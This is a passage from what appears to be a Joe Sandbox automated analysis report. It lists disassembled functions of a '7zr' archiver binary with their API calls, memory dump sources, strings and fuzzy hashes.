                        • API String ID: 3519838083-2298593816
                        • Opcode ID: 3f7bb70360d508b5f608d63a2a2158d778589575e9b14edc2f9b6b7aa2230fd5
                        • Instruction ID: 860e8fffe4830a77cd42f048dd1d5ad503efcc920a6225708a9443933db05111
                        • Opcode Fuzzy Hash: 3f7bb70360d508b5f608d63a2a2158d778589575e9b14edc2f9b6b7aa2230fd5
                        • Instruction Fuzzy Hash: EA1201309047499FDF27EFA4C885BEEBBB9AF04314F14046DE4465B292CB70AE85CB51
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C4E8F
                          • Part of subcall function 0038965D: VariantClear.OLEAUT32(?), ref: 0038967F
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ClearH_prologVariantfree
                        • String ID: file
                        • API String ID: 904627215-2359244304
                        • Opcode ID: 9701ef6f6242d06cd8cb6919fd86a556423c632ee0f0e7bf794712ecadc12f42
                        • Instruction ID: bff109c8bd4bc937f56b6e353d11de5a56b596d5278340bfa610cd51fbc967f9
                        • Opcode Fuzzy Hash: 9701ef6f6242d06cd8cb6919fd86a556423c632ee0f0e7bf794712ecadc12f42
                        • Instruction Fuzzy Hash: 3C124B30900649DFCF16EFA4C985FDEBBB6AF44344F2440ADE405AB252DB71AE46DB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A2CE0
                          • Part of subcall function 00385E10: __EH_prolog.LIBCMT ref: 00385E15
                          • Part of subcall function 003941EC: _CxxThrowException.MSVCRT(?,00434A58), ref: 0039421A
                          • Part of subcall function 0038965D: VariantClear.OLEAUT32(?), ref: 0038967F
                        Strings
                        • Cannot create output directory, xrefs: 003A3070
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ClearExceptionThrowVariant
                        • String ID: Cannot create output directory
                        • API String ID: 814188403-1181934277
                        • Opcode ID: 246649fe7dd5ea92ebfcfae975270bf568cd0240a14455e5910ccc5bba469994
                        • Instruction ID: cc513c72243a7a95bf4c9b1cfaf3b80bea2e1378d96389239398b8a5ac7b71ef
                        • Opcode Fuzzy Hash: 246649fe7dd5ea92ebfcfae975270bf568cd0240a14455e5910ccc5bba469994
                        • Instruction Fuzzy Hash: 52F19F30904289DFCF26EFA8C891AEEBBB5FF1A300F1540A9E44567252DB30AE45DB51
                        APIs
                        • fputs.MSVCRT ref: 003BC840
                          • Part of subcall function 003825CB: _CxxThrowException.MSVCRT(?,00434A58), ref: 003825ED
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrowfputs
                        • String ID:
                        • API String ID: 1334390793-399585960
                        • Opcode ID: 404593f0a876f8f8bc7105fb619afd3dfa73d299b28e45a233cfc959c9be211a
                        • Instruction ID: 2476468414a84e96101a3d577c9e795a6ea00c7c5cdfb0b658e5979856fabc07
                        • Opcode Fuzzy Hash: 404593f0a876f8f8bc7105fb619afd3dfa73d299b28e45a233cfc959c9be211a
                        • Instruction Fuzzy Hash: 0311B2716147449FDB26CF58C8C1BAAFBE6EF49304F05446EE246CB251CBB1B904CB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID: Open
                        • API String ID: 1795875747-71445658
                        • Opcode ID: 1a47f71d0d4d3109ed0be189f1e8793367d6f77ce1179c2ada116472d0d209cb
                        • Instruction ID: b9842953ef5164b90b09382adf04637334a5757212f4547d6a31f9309fa80014
                        • Opcode Fuzzy Hash: 1a47f71d0d4d3109ed0be189f1e8793367d6f77ce1179c2ada116472d0d209cb
                        • Instruction Fuzzy Hash: 3511A032505704DFC722EF34D992ADABBA5EF14314F90857EE29A87212DA35A904CF64
                        APIs
                        • __EH_prolog.LIBCMT ref: 003958C3
                          • Part of subcall function 00386C72: __EH_prolog.LIBCMT ref: 00386C77
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: a34ecd976bd83c425e063bc3c7dfda86e4388a0793cb32815fe56851f8ae8134
                        • Instruction ID: 4789a5d8e259a06a2f6a780e3bdfdfee1825bdf25a9699467675addb7714d11f
                        • Opcode Fuzzy Hash: a34ecd976bd83c425e063bc3c7dfda86e4388a0793cb32815fe56851f8ae8134
                        • Instruction Fuzzy Hash: F7910931900605DFDF27EFA4C881AEEBBB6EF44350F2540A9F942AB251DB319D85C7A4
                        APIs
                        • __EH_prolog.LIBCMT ref: 003D06B3
                        • _CxxThrowException.MSVCRT(?,0043D480), ref: 003D08F2
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrow$H_prologmalloc
                        • String ID:
                        • API String ID: 3044594480-0
                        • Opcode ID: 5bbba6e78d9c7b44444f6255885f0e12686be8442bf1827995965f022185a750
                        • Instruction ID: 717ab9db223788907dcfb4758b1354ed9dc509f2b99fc6231ac29d0e1acf7703
                        • Opcode Fuzzy Hash: 5bbba6e78d9c7b44444f6255885f0e12686be8442bf1827995965f022185a750
                        • Instruction Fuzzy Hash: 33914A71D00249DFCB26DFA8D881BEEBBB5BF08304F15419AE459A7252C730AE45DF61
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: eb883d352cc156459c0c40b2ecd8c01a72fa530cb4f3a1800f080c21a059cf20
                        • Instruction ID: ff4b22767a32a712e116a9d80519a45361b464310a278556250164ebc34ab7cf
                        • Opcode Fuzzy Hash: eb883d352cc156459c0c40b2ecd8c01a72fa530cb4f3a1800f080c21a059cf20
                        • Instruction Fuzzy Hash: 54519F75618B40AFDF26CF64C490AEABBF5BF45304F19889DE4D64B682C730B984DB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A7B4D
                        • memcpy.MSVCRT(00000000,004427DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 003A7C65
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologmemcpy
                        • String ID:
                        • API String ID: 2991061955-0
                        • Opcode ID: f15b47e6d3043ddcb6697fac28424b9b4be0c23827cab86cec647ef5d848429a
                        • Instruction ID: 4bac30acdbe994b1f2cb62fef19f9fc48a62fdd8e58f595ce877e88876a928e7
                        • Opcode Fuzzy Hash: f15b47e6d3043ddcb6697fac28424b9b4be0c23827cab86cec647ef5d848429a
                        • Instruction Fuzzy Hash: B7419B719043189FCF22EFA4C991AEEB7F4FF05300F104469E446AB282DB30AE09CB60
                        APIs
                        • __EH_prolog.LIBCMT ref: 003D1516
                          • Part of subcall function 003D10D3: __EH_prolog.LIBCMT ref: 003D10D8
                        • _CxxThrowException.MSVCRT(?,0043D480), ref: 003D1561
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrow
                        • String ID:
                        • API String ID: 2366012087-0
                        • Opcode ID: 582b1bfd8de64e560dd110b2bf26879d9b60ef1173dc6295048bc057dc85a4f5
                        • Instruction ID: 798438bf3035c8c0e56de5166ea2155255b723ba7d8281c1198c2fbe16c736e3
                        • Opcode Fuzzy Hash: 582b1bfd8de64e560dd110b2bf26879d9b60ef1173dc6295048bc057dc85a4f5
                        • Instruction Fuzzy Hash: 3901F232504248BFDF128F94E815BEE7FB9EF86354F04405BF4055A211C3BAA99587A0
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B5800
                        • fputs.MSVCRT ref: 003B5830
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologfputcfputsfree
                        • String ID:
                        • API String ID: 195749403-0
                        • Opcode ID: 3803de63cc1d291764a56bb5afafdfd361c346d1d06190f8bd0173125a36f55f
                        • Instruction ID: 61f647006166d10d88382bf643061ba468fd9e98fc55177415a8401a72eddbcf
                        • Opcode Fuzzy Hash: 3803de63cc1d291764a56bb5afafdfd361c346d1d06190f8bd0173125a36f55f
                        • Instruction Fuzzy Hash: 32F0BE32A04504CBCB16BB94E4027EEBBB0EF04354F00446AE501A7491CB346996CB88
                        APIs
                        • SysAllocStringLen.OLEAUT32(?,?), ref: 0038952C
                        • _CxxThrowException.MSVCRT(?,004355B8), ref: 0038954A
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AllocExceptionStringThrow
                        • String ID:
                        • API String ID: 3773818493-0
                        • Opcode ID: bdf195fbdd28357770525e6f92e55416bd7b6efd7e11f09e0972184512324f31
                        • Instruction ID: cd6f91e699c130f82d32383aaec7b344601402d607e534926dc6d24bd2b726e8
                        • Opcode Fuzzy Hash: bdf195fbdd28357770525e6f92e55416bd7b6efd7e11f09e0972184512324f31
                        • Instruction Fuzzy Hash: C2F06D72710304EFC721EFA9D885E9A7BECEF05380B40847AF908CB210EB74E8408794
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$fputc
                        • String ID:
                        • API String ID: 1185151155-0
                        • Opcode ID: 3f8f4290ef7fb4f6a48957a70189589421f1ecccae5c77bb108482974d2b9570
                        • Instruction ID: 865b18e864bc6b1ed86e29eac3e23ef927fc3b8685aa25b38c136f63b786b349
                        • Opcode Fuzzy Hash: 3f8f4290ef7fb4f6a48957a70189589421f1ecccae5c77bb108482974d2b9570
                        • Instruction Fuzzy Hash: 2AE08C372091146FD6272B48FC028986799DB8A761326013BE74093264AF532D1A5EA8
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast_beginthreadex
                        • String ID:
                        • API String ID: 4034172046-0
                        • Opcode ID: 43ecb121248ed7ff34a2a748da561fdc3757bf6fcecfa61116d8a1d8de362b5f
                        • Instruction ID: 1e9887aae40d3a74d19d4569d55d04a5c10184fc4e323c6c294bb46519f12682
                        • Opcode Fuzzy Hash: 43ecb121248ed7ff34a2a748da561fdc3757bf6fcecfa61116d8a1d8de362b5f
                        • Instruction Fuzzy Hash: B2E086B22443016AE3109B508C01FA772D89B90740F40447EBA45C6180E660CD41C3A9
                        APIs
                        • GetCurrentProcess.KERNEL32(?,?,00389C6E), ref: 00389C52
                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00389C59
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: Process$AffinityCurrentMask
                        • String ID:
                        • API String ID: 1231390398-0
                        • Opcode ID: 8cccf9b06049f1f43ba52cb0c805a67f0888e219669f4b1049178c5039ebcba0
                        • Instruction ID: 7407da261739199046519fdc35d98e36f5e7e0f27c306fd189e25c5316a1bee1
                        • Opcode Fuzzy Hash: 8cccf9b06049f1f43ba52cb0c805a67f0888e219669f4b1049178c5039ebcba0
                        • Instruction Fuzzy Hash: 5DB092B2500100EBCE209BE09D8CC1A3B2CEE042013404664B109C2010C636C0468B6C
                        APIs
                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 0038B843
                        • GetLastError.KERNEL32 ref: 0038B8AA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLastmemcpy
                        • String ID:
                        • API String ID: 2523627151-0
                        • Opcode ID: bb286f34a476eb3b8d38f16bcacb9a0d88e04b76db9e8e836b061e440f2adac7
                        • Instruction ID: 8740c2350cc21b4cd5996ac95d3c93ad05f643ff6f7d4f82add0c4c75b19782d
                        • Opcode Fuzzy Hash: bb286f34a476eb3b8d38f16bcacb9a0d88e04b76db9e8e836b061e440f2adac7
                        • Instruction Fuzzy Hash: D8817D31600746DFDB76EE25C980A6AF7F6BF84314F1549AEE84687A40E730F941CB50
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrowmalloc
                        • String ID:
                        • API String ID: 2436765578-0
                        • Opcode ID: 5a00e31ceaa56f262474d4a34240f889eaad4505962e4242c3d140ba02ba3418
                        • Instruction ID: 64b95a59f7cb67c125bed1a31acc8c72d2d05e89a187079259cc6703694f58f6
                        • Opcode Fuzzy Hash: 5a00e31ceaa56f262474d4a34240f889eaad4505962e4242c3d140ba02ba3418
                        • Instruction Fuzzy Hash: 30E08C3010434CAACF116FA0D844BD83B6C5B00359F40A066F80C8E101C274E6D68B48
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: e6a2a3ce98e9a9f5c654b94e67333290102f54411717f30f3543d9897c50ff91
                        • Instruction ID: 6c0b17a32bbf728d98bf54887f03dfa3c17b7089ef92c9de2c799057fd98140d
                        • Opcode Fuzzy Hash: e6a2a3ce98e9a9f5c654b94e67333290102f54411717f30f3543d9897c50ff91
                        • Instruction Fuzzy Hash: FA527B30904289DFDF12CFA8C595BAEFBB5AF49304F28409DE845EB291CB759E45CB21
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: f9caf10f3d032bfd992f145289ad8623affbe8426e1a8a8cb95ea5d419fc08c8
                        • Instruction ID: fa7b2c43e94590a70351b721d175d2a7f156c39cfb147a5fd6f9cf2a450d8e3f
                        • Opcode Fuzzy Hash: f9caf10f3d032bfd992f145289ad8623affbe8426e1a8a8cb95ea5d419fc08c8
                        • Instruction Fuzzy Hash: 4DF1FF71906785DFCF23DF64C4A2AAABBF1BF15304F56486EE48A8B612D730AD44CB11
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 8e319525697105a71140be42ad11cdd445423d8777d550c1fee783d059020387
                        • Instruction ID: 5388de127b3050f9426c844873f9196f148377518fbf23772c4e788200fae774
                        • Opcode Fuzzy Hash: 8e319525697105a71140be42ad11cdd445423d8777d550c1fee783d059020387
                        • Instruction Fuzzy Hash: ADD19A76A00745AFDF2ACFA8D880BEEBBB1BF48304F10452EE455A7751D775A884CB90
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CCF96
                          • Part of subcall function 003D1511: __EH_prolog.LIBCMT ref: 003D1516
                          • Part of subcall function 003D1511: _CxxThrowException.MSVCRT(?,0043D480), ref: 003D1561
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrow
                        • String ID:
                        • API String ID: 2366012087-0
                        • Opcode ID: ce7439993fea43a4a29cce6d0d7866b96189b8f0b1aeec4f24cf4bed276593d6
                        • Instruction ID: 54d9f8824ee6d4a04fb97d566b33710fb66b67468d99479ec0fdcae807fd7544
                        • Opcode Fuzzy Hash: ce7439993fea43a4a29cce6d0d7866b96189b8f0b1aeec4f24cf4bed276593d6
                        • Instruction Fuzzy Hash: F4511B71900289DFCB12DFA8C888FAEBBB4AF49304F1444AEF45AD7242C7759E45DB21
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: ccd748b234d25d2932b66d04897b392f6451f61c9597d8d0d4c93d68f216c6a4
                        • Instruction ID: 13b2fc9da37c40030990474fbc669e17ba19e7ac0e4f51335f46ed7260a7f9a9
                        • Opcode Fuzzy Hash: ccd748b234d25d2932b66d04897b392f6451f61c9597d8d0d4c93d68f216c6a4
                        • Instruction Fuzzy Hash: CD515D74A00706DFCB15CF64C8909BAFBB2FF89348B10496DD692ABB51D731A905CF90
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
